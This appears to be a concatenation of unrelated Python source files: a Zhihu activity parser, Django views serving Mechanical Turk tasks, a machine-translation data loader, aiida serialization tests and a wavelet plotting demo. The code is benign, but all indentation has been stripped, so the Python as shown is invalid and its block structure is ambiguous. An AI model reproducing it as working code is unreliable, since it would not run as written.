"""
        :return: the time at which the user performed this Activity
:rtype: datetime.datetime
"""
return self._time
def __find_post(self, act):
try:
column_url = act.find('a', class_='column_link')['href']
column_name = act.find('a', class_='column_link').text
column = Column(column_url, column_name, session=self._session)
except TypeError:
column = None
try:
author_tag = act.find('div', class_='author-info')
author_url = Zhihu_URL + author_tag.a['href']
author_name = author_tag.a.text
author_motto = author_tag.span.text if author_tag.span else ''
author = Author(author_url, author_name, author_motto,
session=self._session)
except TypeError:
author = ANONYMOUS
post_url = act.find('a', class_='post-link')['href']
post_title = act.find('a', class_='post-link').text
post_comment_num, post_upvote_num = self._parse_un_cn(act)
return Post(post_url, column, author, post_title,
post_upvote_num, post_comment_num,
session=self._session)
def _assemble_create_post(self, act):
return self.__find_post(act)
def _assemble_voteup_post(self, act):
return self.__find_post(act)
def _assemble_follow_column(self, act):
return Column(act.div.a['href'], act.div.a.text, session=self._session)
def _assemble_follow_topic(self, act):
topic_url = Zhihu_URL + act.div.a['href']
topic_name = act.div.a['title']
return Topic(topic_url, topic_name, session=self._session)
def _assemble_answer_question(self, act):
question_url = Zhihu_URL + re_a2q.match(
act.div.find_all('a')[-1]['href']).group(1)
question_title = act.div.find_all('a')[-1].text.strip()
question = Question(question_url, question_title, session=self._session)
answer_url = Zhihu_URL + act.div.find_all('a')[-1]['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, self._author, answer_upvote_num,
session=self._session)
def _assemble_voteup_answer(self, act):
question_url = Zhihu_URL + re_a2q.match(act.div.a['href']).group(1)
question_title = act.div.a.text.strip()
question = Question(question_url, question_title, session=self._session)
try_find_author = act.find_all('a', class_='author-link',
href=re.compile('^/people/[^/]*$'))
if len(try_find_author) == 0:
author_url = None
author_name = '匿名用户'
author_motto = ''
else:
try_find_author = try_find_author[-1]
author_url = Zhihu_URL + try_find_author['href']
author_name = try_find_author.text
try_find_motto = act.find('span', class_='bio')
if try_find_motto is None:
author_motto = ''
else:
author_motto = try_find_motto['title']
author = Author(author_url, author_name, author_motto,
session=self._session)
answer_url = Zhihu_URL + act.div.a['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, author, answer_upvote_num,
session=self._session)
def _assemble_ask_question(self, act):
a = act.find("a", class_="question_link")
url = Zhihu_URL + a['href']
title = a.text.strip(' \n')
return Question(url, title, session=self._session)
def _assemble_follow_question(self, act):
return Question(Zhihu_URL + act.div.a['href'], act.div.a.text.strip(),
session=self._session)
def _assemble_follow_collection(self, act):
url = act.div.a['href']
if not url.startswith('http'):
url = Zhihu_URL + url
return Collection(url, session=self._session)
def _get_assemble_method(self, act_type):
assemble_methods = {
ActType.UPVOTE_POST: self._assemble_voteup_post,
ActType.FOLLOW_COLUMN: self._assemble_follow_column,
ActType.UPVOTE_ANSWER: self._assemble_voteup_answer,
ActType.ANSWER_QUESTION: self._assemble_answer_question,
ActType.ASK_QUESTION: self._assemble_ask_question,
ActType.FOLLOW_QUESTION: self._assemble_follow_question,
ActType.FOLLOW_TOPIC: self._assemble_follow_topic,
ActType.PUBLISH_POST: self._assemble_create_post,
ActType.FOLLOW_COLLECTION: self._assemble_follow_collection
}
if act_type in assemble_methods:
return assemble_methods[act_type]
else:
raise ValueError('invalid activity type')
@staticmethod
def _parse_un_cn(act):
upvote_num = act.find('a', class_='zm-item-vote-count').text
if upvote_num.isdigit():
upvote_num = int(upvote_num)
else:
upvote_num = None
comment = act.find('a', class_='toggle-comment')
comment_text = next(comment.stripped_strings)
comment_num_match = re_get_number.match(comment_text)
comment_num = int(
comment_num_match.group(1)) if comment_num_match is not None else 0
return comment_num, upvote_num
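# --- Illustrative usage sketch (not part of the original module) ---
# Activity objects are normally obtained through Author.activities (see the
# class docstring); the loop below is a hypothetical sketch, with `some_author`
# standing in for an already constructed Author:
#
#   for act in some_author.activities:
#       print(act.time, act.type)
#       if act.type == ActType.ANSWER_QUESTION:
#           answer = act.content  # an Answer instance for this activity type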
|
server/mturk/views/external.py | paulu/opensurfaces | 137 | 12690736 | """
Tasks viewed from the mturk website nested in an iframe
"""
import json
import random
import datetime
from ua_parser import user_agent_parser
from django.conf import settings
from django.core.context_processors import csrf
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import ensure_csrf_cookie
from django.http import Http404
from django.shortcuts import render, get_object_or_404
from django.views.decorators.cache import never_cache
from common.utils import recursive_sum, recursive_dict_exclude, \
html_error_response
from mturk.models import MtHit, MtAssignment, Experiment, ExperimentWorker
from mturk.tasks import mturk_submit_task, \
increment_hit_counter_task, expire_hit_task
from mturk.utils import get_or_create_mturk_worker_from_request, \
get_content_model_prefetch, fetch_hit_contents, \
fetch_content_tuples
from common.utils import json_success_response, json_error_response
#
# View functions
#
#@staff_member_required
@never_cache
def admin_preview_task(request, experiment_id, override, hit_id=None):
if hit_id:
hit = get_object_or_404(MtHit, id=hit_id)
else:
hits = MtHit.objects \
.filter(hit_type__experiment_id=experiment_id, ) \
.order_by('-num_assignments_completed', '?')[:1]
try:
hit = hits[0]
except:
try:
e = Experiment.objects.get(id=experiment_id)
return html_error_response(
request, 'There are no HITs created for this experiment yet. '
'Experiment id: %s, slug: "%s", title: "%s".' % (
e.id, e.slug, e.new_hit_settings.title)
)
except:
return html_error_response(
request, 'This experiment does not exist. Experiment id: %s.' %
(experiment_id)
)
return external_task(
request, experiment_id=experiment_id, hit=hit, override=override)
@require_POST
def external_incompatible(request, id):
""" Increment view counter for an incompatible view """
increment_hit_counter_task.delay(id, 'incompatible_count')
return json_success_response()
@require_POST
def external_compatible(request, id):
""" Increment view counter for a compatible view """
increment_hit_counter_task.delay(id, 'compatible_count')
return json_success_response()
@ensure_csrf_cookie
# <EMAIL>  <-- already provided by ATOMIC_REQUESTS
def external_task(request, experiment_id, hit=None, override=None):
"""
Renders a MTurk task, both preview and instructions.
override: either None, "inst", "task", or "tut"
"""
# override is only for staff members
#if not request.user.is_staff:
#override = None
# browser check
response = external_task_browser_check(request)
if response:
return response
# get HIT info etc
context_or_response = external_task_prepare_context(
request, experiment_id, hit, override)
if not isinstance(context_or_response, dict):
return context_or_response
else:
context = context_or_response
# handle tutorials: both GET and POST. if this returns None, then we know
# this is not a tutorial (or tutorial submission)
response = external_task_tutorial(request, context)
if response:
return response
# either task or instructions page
if request.method == 'POST':
return external_task_POST(request, context)
else:
return external_task_GET(request, context)
#
# Helper functions
#
def is_preview_request(request):
""" Return true if this is a request for a task preview """
return ('assignmentId' not in request.GET or
request.GET['assignmentId'] == 'ASSIGNMENT_ID_NOT_AVAILABLE')
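# Illustrative note (not from the original module): during an MTurk preview,
# Amazon loads the external URL with GET parameters along the lines of
#   ?hitId=<some hit id>&assignmentId=ASSIGNMENT_ID_NOT_AVAILABLE
# so is_preview_request() returns True; once a worker accepts the HIT, real
# assignmentId / workerId / turkSubmitTo values are passed instead and it
# returns False.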
def external_task_browser_check(request):
if request.method == "GET":
valid_browser = False
if 'HTTP_USER_AGENT' in request.META:
ua = user_agent_parser.Parse(request.META['HTTP_USER_AGENT'])
if ua['user_agent']['family'].lower() in ('firefox', 'chrome'):
device = ua['device']
if 'is_mobile' not in device or not device['is_mobile']:
valid_browser = True
if not valid_browser:
return html_error_response(
request, '''
This task requires Google Chrome. <br/><br/>
<a class="btn" href="http://www.google.com/chrome/"
target="_blank">Get Google Chrome</a>
''')
return None
def external_task_prepare_context(request, experiment_id, hit, override):
""" Fetch hit, experiment, assignment, worker, etc. Returns either a
dictionary on success, or a response (or exception) if there is some error.
"""
# obtain HIT
if hit is None:
if 'hitId' not in request.GET:
if request.user.is_staff:
return html_error_response(
request, 'HIT ID missing from GET parameters')
else:
raise Http404
hit_id = request.GET['hitId']
try:
hit = MtHit.objects \
.select_related(
'hit_type__experiment',
'hit_type__experiment_settings',
'hit_type__requirements') \
.get(id=hit_id)
except MtHit.DoesNotExist:
# if this HIT cannot be found, tell Amazon about it
if (override is None and
not request.user.is_staff and
'assignmentId' in request.GET and
'workerId' in request.GET and
'turkSubmitTo' in request.GET):
expire_hit_task.delay(hit_id)
raise Http404
# obtain experiment
experiment = hit.hit_type.experiment
if experiment.id != int(experiment_id):
if request.user.is_staff:
return html_error_response(
request, 'Experiment ID (%s) does not match HIT (%s)' % (
experiment_id, experiment.id)
)
else:
raise Http404
# obtain worker and assignment
worker = get_or_create_mturk_worker_from_request(request)
assignment_dirty = False
if worker and 'assignmentId' in request.GET:
assignment, _ = MtAssignment.objects.get_or_create(
id=request.GET['assignmentId'],
defaults={'hit': hit, 'worker': worker})
if assignment.hit != hit or assignment.worker != worker:
assignment.hit = hit
assignment.worker = worker
assignment_dirty = True
else:
assignment = None
worker = None
# obtain worker info specific to the experiment and worker
if experiment and worker:
experiment_worker, _ = ExperimentWorker.objects.get_or_create(
experiment=experiment, worker=worker)
else:
experiment_worker = None
# don't let blocked workers perform our tasks
if (worker and worker.blocked) or (experiment_worker and experiment_worker.blocked):
message = "Your submissions are too low quality. Please stop doing our tasks."
if experiment_worker and experiment_worker.blocked_reason:
message += "<br/><br/>" + experiment_worker.blocked_reason
elif worker and worker.blocked_reason:
message += "<br/><br/>" + worker.blocked_reason
return html_error_response(request, message)
# fetch contents
hit_contents = fetch_hit_contents(hit)
if override and 'publishable' in request.GET:
hit_contents = filter(lambda x: x and x.publishable(), hit_contents)
if not hit.num_contents or not hit_contents:
# (in the if statement, also test hit.num_contents since it is only set
# after the last content is added)
return html_error_response(
request, "Somehow there are no items in this HIT.")
# fetch test (sentinel) contents
if experiment_worker:
if assignment.num_test_contents is None:
n = experiment.test_contents_per_assignment
if n > 0:
# select new test contents from the set of possible contents
# (that the user has not already answered)
test_content_wrappers = experiment.test_contents.all() \
.exclude(responses__experiment_worker=experiment_worker) \
.order_by('-priority')[:n]
# register chosen items with assignment
assignment.test_contents.add(*test_content_wrappers)
else:
test_content_wrappers = []
assignment.num_test_contents = len(test_content_wrappers)
assignment_dirty = True
elif assignment.num_test_contents > 0:
# re-fetch existing contents
test_content_wrappers = assignment.test_contents.all()
else:
test_content_wrappers = []
# fetch objects from inside the wrappers
if test_content_wrappers:
test_contents = fetch_content_tuples([
(x.content_type_id, x.object_id)
for x in test_content_wrappers
])
else:
test_contents = []
else:
test_contents = []
test_content_wrappers = []
# shuffle together (some tasks may sort contents again in javascript)
contents = hit_contents + test_contents
random.shuffle(contents)
# prepare context data
context = {
'hit': hit,
'assignment': assignment,
'worker': worker,
'experiment': experiment,
'experiment_id': experiment_id,
'experiment_worker': experiment_worker,
'slug': experiment.slug,
'hit_contents': hit_contents,
'test_content_wrappers': test_content_wrappers,
'test_contents': test_contents,
'contents': contents,
'num_contents': len(contents),
'num_contents_predicted': (len(hit_contents) +
experiment.test_contents_per_assignment),
'override': override,
}
if len(contents) == 1:
context['content'] = contents[0]
if experiment.version >= 2:
# old experiments (version 1) don't use this
context['contents_json'] = json.dumps(
[c.get_entry_dict() for c in contents])
# list of ids as json
context['content_id_json'] = json.dumps(
[{'id': c.id} for c in contents])
# requirements
for req in hit.hit_type.requirements.values('name', 'value'):
context[req['name']] = req['value']
if assignment_dirty:
assignment.save()
return context
def external_task_tutorial(request, context):
""" Handle tutorials. On a GET, decide whether to serve up a tutorial.
On a POST, record that the tutorial was completed, then the client will
refresh. Returns either a response or None. """
# unpack some variables
experiment, worker, override = [
context[k] for k in ['experiment', 'worker', 'override']]
if (request.method == "GET" and experiment.has_tutorial and
(override == "tut" or not is_preview_request(request))):
show_tutorial = (override == "tut" or
not context['experiment_worker'].tutorial_completed)
if show_tutorial:
context.update(csrf(request))
template_name = experiment.template_name()
return render(request, '%s_tut.html' % template_name, context)
elif (request.method == "POST" and override is None and
'tutorial_complete' in request.POST and
request.POST['tutorial_complete'] == 'true'):
ew_id = context['experiment_worker'].id
ExperimentWorker.objects.filter(id=ew_id) \
.update(tutorial_completed=True)
return json_success_response()
return None
def external_task_POST(request, context):
""" Handles POSTs for mturk tasks. Returns a response. """
# unpack some variables
experiment, hit, assignment, worker, override, experiment_worker = [
context[k] for k in [
'experiment', 'hit', 'assignment', 'worker', 'override',
'experiment_worker'
]
]
# error checks
if override is not None:
return json_error_response(
"You cannot submit in admin preview mode.")
if not worker or not assignment:
return json_error_response(
"There was an error obtaining your Assignment ID from Amazon.")
# check that POST is allowed
if hit.sandbox and not settings.MTURK_ACCEPT_SANDBOX_HITS:
return json_error_response(
"Not currently accepting sandbox HITs. POST data: " +
json.dumps(request.POST))
# extract submit data
results = json.loads(request.POST['results'])
time_ms = json.loads(request.POST['time_ms']) \
if 'time_ms' in request.POST else None
time_active_ms = json.loads(request.POST['time_active_ms']) \
if 'time_active_ms' in request.POST else None
time_load_ms = json.loads(request.POST['time_load_ms']) \
if 'time_load_ms' in request.POST else None
complete = ('partial' not in request.POST or
str(request.POST['partial']) != 'true')
version = json.loads(request.POST['version'])
action_log = request.POST.get('action_log', '')
screen_width = request.POST.get('screen_width', None)
screen_height = request.POST.get('screen_height', None)
# fix any potential str/int issues
if isinstance(time_ms, basestring) and time_ms.isdigit():
time_ms = int(time_ms)
if isinstance(time_active_ms, basestring) and time_active_ms.isdigit():
time_active_ms = int(time_active_ms)
if isinstance(time_load_ms, basestring) and time_load_ms.isdigit():
time_load_ms = int(time_load_ms)
# store assignment POST information
post_dict = {}
meta_dict = {}
for k, v in request.META.iteritems():
# some non-encodable things get put in here -- filter them out by
# forcing the unicode encoding
try:
meta_dict[unicode(k)] = unicode(v)
except:
pass
for k, v in request.POST.iteritems():
# some non-encodable things get put in here -- filter them out by
# forcing the unicode encoding
try:
post_dict[unicode(k)] = unicode(v)
except:
pass
# store dictionaries, not nested dictionaries
post_dict[u'results'] = recursive_dict_exclude(results, [
u'screenshot'])
post_dict[u'time_ms'] = time_ms
post_dict[u'time_active_ms'] = time_active_ms
post_dict[u'time_load_ms'] = time_load_ms
assignment.post_data = json.dumps(post_dict)
assignment.post_meta = json.dumps(meta_dict)
if 'HTTP_USER_AGENT' in request.META:
assignment.user_agent = request.META['HTTP_USER_AGENT']
assignment_dirty = False
experiment_worker_dirty = False
# update assignment info
if complete:
assignment.time_ms = recursive_sum(time_ms)
assignment.time_active_ms = recursive_sum(time_active_ms)
assignment.time_load_ms = recursive_sum(time_load_ms)
assignment.status = MtAssignment.str_to_status['Submitted']
assignment.submit_time = datetime.datetime.now()
assignment.action_log = action_log
assignment.screen_width = screen_width
assignment.screen_height = screen_height
if 'feedback' in request.POST:
assignment.feedback = request.POST['feedback']
# must fill in at least 2/3 fields to count
if assignment.feedback and len(json.loads(assignment.feedback)) >= 2:
assignment.has_feedback = True
assignment_dirty = True
# mark test contents data as seen. it can't be done async or else the next
# task will re-serve the same test items.
rejected_assignment = False
if assignment.num_test_contents:
experiment_worker = context['experiment_worker']
test_content_wrappers = context['test_content_wrappers']
test_contents = context['test_contents']
# grade test contents
responses, responses_correct = hit.hit_type.experiment_settings \
.out_content_model().mturk_grade_test(
test_content_wrappers, test_contents, results)
# store in database
for i, tcw in enumerate(test_content_wrappers):
# If the user accepts multiple HITs at once, then they can be
# served the same test objects. In that case, only store their
# first answer, since the second time they see it, they will know
# it is a test item.
if not tcw.responses.filter(experiment_worker=experiment_worker).exists():
tcw.responses.create(
experiment_worker=experiment_worker,
assignment=assignment,
response=unicode(responses[i]),
correct=responses_correct[i],
)
# update local correct counts
assignment.num_test_correct = sum(responses_correct)
assignment.num_test_incorrect = sum(not x for x in responses_correct)
assignment_dirty = True
# update global correct counts
experiment_worker.num_test_correct = \
experiment_worker.test_content_responses.filter(correct=True).count()
experiment_worker.num_test_incorrect = \
experiment_worker.test_content_responses.filter(correct=False).count()
experiment_worker_dirty = True
# always approve, but give a message if they do badly
if assignment.num_test_incorrect >= 3 and assignment.num_test_correct == 0:
perc = int(100 * assignment.num_test_correct / (
assignment.num_test_correct + assignment.num_test_incorrect))
message = make_reject_message(experiment, hit, perc)
#from mturk.tasks import reject_assignment_task
from mturk.tasks import approve_assignment_task
approve_assignment_task.apply_async(
kwargs={
'assignment_id': assignment.id,
'feedback': message,
}, countdown=60, retry=True, retry_policy={'max_retries': 100})
rejected_assignment = True
        # block if accuracy ever creeps below 80% (with at least 5 errors)
if experiment_worker.num_test_incorrect > 5:
perc = int(100 * experiment_worker.num_test_correct / (
experiment_worker.num_test_correct +
experiment_worker.num_test_incorrect))
if perc < 80:
message = make_reject_message(experiment, hit, perc)
experiment_worker.block(reason=message, method='T', save=False)
experiment_worker_dirty = True
# otherwise auto-approve
elif (not rejected_assignment and
(experiment_worker.auto_approve or settings.MTURK_AUTO_APPROVE)):
from mturk.tasks import approve_assignment_task
approve_assignment_task.apply_async(
kwargs={
'assignment_id': assignment.id,
'feedback': experiment_worker.auto_approve_message,
}, countdown=60, retry=True, retry_policy={'max_retries': 100})
if assignment_dirty:
assignment.save()
if experiment_worker_dirty:
experiment_worker.save()
# submit (rest of) data asynchronously
mturk_submit_task.apply_async(
# note: 'contents' not serialized in this list -- the task re-fetches
# this from the database.
kwargs={
'user_id': worker.user_id,
'mturk_hit_id': hit.id,
'mturk_assignment_id': assignment.id,
'experiment_id': experiment.id,
'results': results, # dict with content id as key
'time_ms': time_ms, # number or dict with content id as key
'time_active_ms': time_active_ms, # same format as time_ms
'time_load_ms': time_load_ms,
'complete': complete,
'version': version,
},
retry=True,
retry_policy={
'max_retries': None, # (retry forever)
'interval_start': 300,
'interval_step': 60,
'interval_max': 600,
}
)
# success
return json_success_response()
def make_reject_message(experiment, hit, perc):
"""
perc: percentage correct, ranging from 0 to 100.
"""
# make an experiment-specific reject message
module = experiment.get_module()
if module and hasattr(module, 'make_reject_message'):
message = module.make_reject_message(experiment, hit, perc)
else:
message = None
if not message:
message = (
"We checked some of your answers against our correct answers "
"and found that your accuracy was %s percent, which is too "
"low. This is for the task: %s."
) % (perc, hit.hit_type.title)
return message
def external_task_GET(request, context):
""" Handles GETs for mturk tasks. Returns a response. """
# unpack some variables
override, experiment = [context[k] for k in ['override', 'experiment']]
# template name is based on experiment parameters
if experiment.variant:
variant = json.loads(experiment.variant)
else:
variant = None
context['variant'] = variant
# template names
template_name = experiment.template_name()
context['instructions'] = '%s_inst_content.html' % template_name
context['content_thumb_template'] = '%s_thumb.html' % template_name
# fetch examples from database
publishable = override and 'publishable' in request.GET
external_task_prepare_examples(
context, experiment, publishable=publishable)
# add extra context depending on the task
external_task_extra_context(experiment.slug, context)
# decide if we need feedback
external_task_prepare_feedback(request, context)
if override == "task" or not is_preview_request(request):
context.update(csrf(request))
return render(request, '%s.html' % template_name, context)
else:
return render(request, '%s_inst.html' % template_name, context)
def external_task_prepare_feedback(request, context):
""" Sets the necessary feedback variables """
# unpack some variables
experiment, hit, worker = [
context[k] for k in ['experiment', 'hit', 'worker']
]
# ask for feedback if we haven't gotten any yet, and they have
# completed at least two other HITs
context['ask_for_feedback'] = 'false'
context['feedback_bonus'] = 0
if context['worker'] and context['hit'].hit_type.feedback_bonus is not None:
hit_count = MtAssignment.objects.filter(
worker=worker,
hit__hit_type=hit.hit_type,
).count()
if hit_count == 3 or (hit_count >= 10 and hit_count % 10 == 0):
feedback_count = MtAssignment.objects.filter(
worker=worker,
has_feedback=True,
hit__hit_type__experiment__completed_id=experiment.completed_id,
).count()
if feedback_count == 0:
context['ask_for_feedback'] = 'true'
context['feedback_bonus'] = hit.hit_type.feedback_bonus
def external_task_prepare_examples(
context, experiment, num_examples=16, publishable=False):
""" Prepare good/bad examples for display. publishable: if True, only show
creative-commons generic photos -- only useful for generating screenshots
of tasks for publications. """
if not experiment.examples.exists():
return
# get content model
content_model = experiment.examples.all()[0].__class__
prefetch = get_content_model_prefetch(content_model)
# good examples
examples_good = [obj.content for obj in experiment.examples
.filter(good=True).order_by('?')[:num_examples]
.prefetch_related(*prefetch)]
# try and find matching bad examples
group_attr = experiment.examples_group_attr
if (examples_good and content_model and
group_attr and hasattr(content_model, group_attr)):
group_id = group_attr + '_id'
# object ids, matched on group attribute (e.g. 'shape')
ids = content_model.objects \
.filter(**{
group_id + '__in':
[getattr(c, group_id) for c in examples_good]
}) \
.values_list('id', flat=True)
# fetch matching bad examples
examples_bad = [x.content for x in experiment.examples
.filter(object_id__in=ids, good=False)
.prefetch_related(*prefetch)]
# re-order good examples to put matches first
examples_bad_dict = {getattr(x, group_id): x for x in examples_bad}
examples_good.sort(
key=lambda x: getattr(x, group_id) not in examples_bad_dict)
# re-order bad examples to match good examples ordering
examples_bad = []
for c in examples_good:
if getattr(c, group_id) in examples_bad_dict:
examples_bad.append(examples_bad_dict[getattr(c, group_id)])
# fetch remaining examples
num_extra = num_examples - len(examples_bad)
if num_extra > 0:
new_examples_bad_queryset = experiment.examples \
.filter(good=False) \
.exclude(object_id__in=ids) \
.order_by('?')[:num_extra] \
.prefetch_related(*prefetch)
examples_bad += [
obj.content for obj in new_examples_bad_queryset]
else:
examples_bad = [e.content for e in experiment.examples
.filter(good=False).order_by('?')[:num_examples]
.prefetch_related(*prefetch)]
if examples_good:
if publishable:
examples_good = filter(lambda x: x.publishable(), examples_good)
context['examples_good'] = examples_good
context['examples_good_json'] = json.dumps(
[c.get_entry_dict() for c in examples_good])
if examples_bad:
if publishable:
examples_bad = filter(lambda x: x.publishable(), examples_bad)
context['examples_bad'] = examples_bad
context['examples_bad_json'] = json.dumps(
[c.get_entry_dict() for c in examples_bad])
def external_task_extra_context(slug, context):
""" Add extra context for each task """
module = context['experiment'].get_module()
if module and hasattr(module, 'external_task_extra_context'):
module.external_task_extra_context(slug, context)
|
python/spinn/data/mt/load_mt_data.py | pramitmallick/spinn | 103 | 12690740 | <filename>python/spinn/data/mt/load_mt_data.py
import numpy as np
import json
import codecs
import re
import csv
FIXED_VOCABULARY = None
SENTENCE_PAIR_DATA = False
#source: ( That ( ( 's ( ( a lot ) ( to ( pack ( into ( 18 minutes ) ) ) ) ) ) . ) )
#target: وأخرج ملتحفا فوطتي، كان الجميع يراني .
def load_data(source_path, target_path, trg_language="arabic", src_language="english", data_type="gt", is_lowercase=True):
examples = []
s_file=open(source_path)
t_file=open(target_path)
i=0
for element in zip(s_file.readlines(), t_file.readlines()):
line = element[0].strip()
s_tokens, s_transitions=convert_binary_bracketing(line, data_type=data_type, lowercase=is_lowercase)
if trg_language=="zh":
t_tokens=list(element[1])
else:
t_tokens=element[1].lower().split()
example = {}
example["tokens"] = s_tokens
example["target_tokens"] = t_tokens+["<s>"]#end token for mt predictions.
example["transitions"] = s_transitions
example["example_id"]=i
i+=1
examples.append(example)
return examples
def convert_binary_bracketing(parse, data_type="gt",lowercase=False):
transitions = []
tokens = []
for word in parse.split(' '):
if word[0] != "(":
if word.strip() == ")":
transitions.append(1)
else:
# Downcase all words to match GloVe.
if lowercase:
tokens.append(word.lower())
else:
tokens.append(word)
transitions.append(0)
if(data_type=="lb"):
transitions=lb_build(len(tokens))
elif(data_type=="bal"):
transitions=balanced_transitions(len(tokens))
elif(data_type=="rb"):
transitions=rb_build(len(tokens))
#print(transitions)
return tokens, transitions
def lb_build(N):
if N==2:
return [0,0,1]
else:
return [0,0,1]+(N-2)*[0,1]
def rb_build(N):
return [0]*(N)+[1]*(N-1)
def balanced_transitions(N):
"""
Recursively creates a balanced binary tree with N
leaves using shift reduce transitions.
"""
if N == 3:
return [0, 0, 1, 0, 1]
elif N == 2:
return [0, 0, 1]
elif N == 1:
return [0]
else:
right_N = N // 2
left_N = N - right_N
return balanced_transitions(left_N) + balanced_transitions(right_N) + [1]
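# Worked example (illustrative, not part of the original file): for a 4-token
# sentence, with 0 = shift a token and 1 = reduce the top two subtrees,
#   lb_build(4)             -> [0, 0, 1, 0, 1, 0, 1]   (left-branching)
#   rb_build(4)             -> [0, 0, 0, 0, 1, 1, 1]   (right-branching)
#   balanced_transitions(4) -> [0, 0, 1, 0, 0, 1, 1]   (balanced)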
|
tests/orm/utils/test_serialize.py | mkrack/aiida-core | 153 | 12690748 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Tests for the :mod:`aiida.orm.utils.serialize` module."""
import types
import numpy as np
import pytest
from aiida import orm
from aiida.common.links import LinkType
from aiida.orm.utils import serialize
pytestmark = pytest.mark.usefixtures('aiida_profile_clean')
def test_serialize_round_trip():
"""
    Test the serialization of a dictionary with Nodes in various data structures.
Also make sure that the serialized data is json-serializable
"""
node_a = orm.Data().store()
node_b = orm.Data().store()
data = {'test': 1, 'list': [1, 2, 3, node_a], 'dict': {('Si',): node_b, 'foo': 'bar'}, 'baz': 'aar'}
serialized_data = serialize.serialize(data)
deserialized_data = serialize.deserialize_unsafe(serialized_data)
# For now manual element-for-element comparison until we come up with general
# purpose function that can equate two node instances properly
assert data['test'] == deserialized_data['test']
assert data['baz'] == deserialized_data['baz']
assert data['list'][:3] == deserialized_data['list'][:3]
assert data['list'][3].uuid == deserialized_data['list'][3].uuid
assert data['dict'][('Si',)].uuid == deserialized_data['dict'][('Si',)].uuid
def test_serialize_group():
"""
Test that serialization and deserialization of Groups works.
Also make sure that the serialized data is json-serializable
"""
group_name = 'groupie'
group_a = orm.Group(label=group_name).store()
data = {'group': group_a}
serialized_data = serialize.serialize(data)
deserialized_data = serialize.deserialize_unsafe(serialized_data)
assert data['group'].uuid == deserialized_data['group'].uuid
assert data['group'].label == deserialized_data['group'].label
def test_serialize_node_round_trip():
"""Test you can serialize and deserialize a node"""
node = orm.Data().store()
deserialized = serialize.deserialize_unsafe(serialize.serialize(node))
assert node.uuid == deserialized.uuid
def test_serialize_group_round_trip():
"""Test you can serialize and deserialize a group"""
group = orm.Group(label='test_serialize_group_round_trip').store()
deserialized = serialize.deserialize_unsafe(serialize.serialize(group))
assert group.uuid == deserialized.uuid
assert group.label == deserialized.label
def test_serialize_computer_round_trip(aiida_localhost):
"""Test you can serialize and deserialize a computer"""
deserialized = serialize.deserialize_unsafe(serialize.serialize(aiida_localhost))
# pylint: disable=no-member
assert aiida_localhost.uuid == deserialized.uuid
assert aiida_localhost.label == deserialized.label
def test_serialize_unstored_node():
"""Test that you can't serialize an unstored node"""
node = orm.Data()
with pytest.raises(ValueError):
serialize.serialize(node)
def test_serialize_unstored_group():
"""Test that you can't serialize an unstored group"""
group = orm.Group(label='test_serialize_unstored_group')
with pytest.raises(ValueError):
serialize.serialize(group)
def test_serialize_unstored_computer():
"""Test that you can't serialize an unstored node"""
computer = orm.Computer('test_computer', 'test_host')
with pytest.raises(ValueError):
serialize.serialize(computer)
def test_mixed_attribute_normal_dict():
"""Regression test for #3092.
The yaml mapping constructor in `aiida.orm.utils.serialize` was not properly "deeply" reconstructing nested
mappings, causing a mix of attribute dictionaries and normal dictionaries to lose information in a round-trip.
If a nested `AttributeDict` contained a normal dictionary, the content of the latter would be lost during the
deserialization, despite the information being present in the serialized yaml dump.
"""
from aiida.common.extendeddicts import AttributeDict
# Construct a nested `AttributeDict`, which should make all nested dictionaries `AttributeDicts` recursively
dictionary = {'nested': AttributeDict({'dict': 'string', 'value': 1})}
attribute_dict = AttributeDict(dictionary)
# Now add a normal dictionary in the attribute dictionary
attribute_dict['nested']['normal'] = {'a': 2}
serialized = serialize.serialize(attribute_dict)
deserialized = serialize.deserialize_unsafe(serialized)
assert attribute_dict, deserialized
def test_serialize_numpy():
"""Regression test for #3709
Check that numpy arrays can be serialized.
"""
data = np.array([1, 2, 3])
serialized = serialize.serialize(data)
deserialized = serialize.deserialize_unsafe(serialized)
assert np.all(data == deserialized)
def test_serialize_simplenamespace():
"""Regression test for #3709
Check that `types.SimpleNamespace` can be serialized.
"""
data = types.SimpleNamespace(a=1, b=2.1)
serialized = serialize.serialize(data)
deserialized = serialize.deserialize_unsafe(serialized)
assert data == deserialized
def test_enum():
"""Test serialization and deserialization of an ``Enum``."""
enum = LinkType.RETURN
serialized = serialize.serialize(enum)
assert isinstance(serialized, str)
deserialized = serialize.deserialize_unsafe(serialized)
assert deserialized == enum
|
demo/plot_wavelets.py | SalvoCas/pywt | 1,435 | 12690756 | <reponame>SalvoCas/pywt<filename>demo/plot_wavelets.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Plot scaling and wavelet functions for db, sym, coif, bior and rbio families
import itertools
import matplotlib.pyplot as plt
import pywt
plot_data = [('db', (4, 3)),
('sym', (4, 3)),
('coif', (3, 2))]
for family, (rows, cols) in plot_data:
fig = plt.figure()
fig.subplots_adjust(hspace=0.2, wspace=0.2, bottom=.02, left=.06,
right=.97, top=.94)
colors = itertools.cycle('bgrcmyk')
wnames = pywt.wavelist(family)
i = iter(wnames)
for col in range(cols):
for row in range(rows):
try:
wavelet = pywt.Wavelet(next(i))
except StopIteration:
break
phi, psi, x = wavelet.wavefun(level=5)
color = next(colors)
ax = fig.add_subplot(rows, 2 * cols, 1 + 2 * (col + row * cols))
ax.set_title(wavelet.name + " phi")
ax.plot(x, phi, color)
ax.set_xlim(min(x), max(x))
ax = fig.add_subplot(rows, 2*cols, 1 + 2*(col + row*cols) + 1)
ax.set_title(wavelet.name + " psi")
ax.plot(x, psi, color)
ax.set_xlim(min(x), max(x))
for family, (rows, cols) in [('bior', (4, 3)), ('rbio', (4, 3))]:
fig = plt.figure()
fig.subplots_adjust(hspace=0.5, wspace=0.2, bottom=.02, left=.06,
right=.97, top=.94)
colors = itertools.cycle('bgrcmyk')
wnames = pywt.wavelist(family)
i = iter(wnames)
for col in range(cols):
for row in range(rows):
try:
wavelet = pywt.Wavelet(next(i))
except StopIteration:
break
phi, psi, phi_r, psi_r, x = wavelet.wavefun(level=5)
row *= 2
color = next(colors)
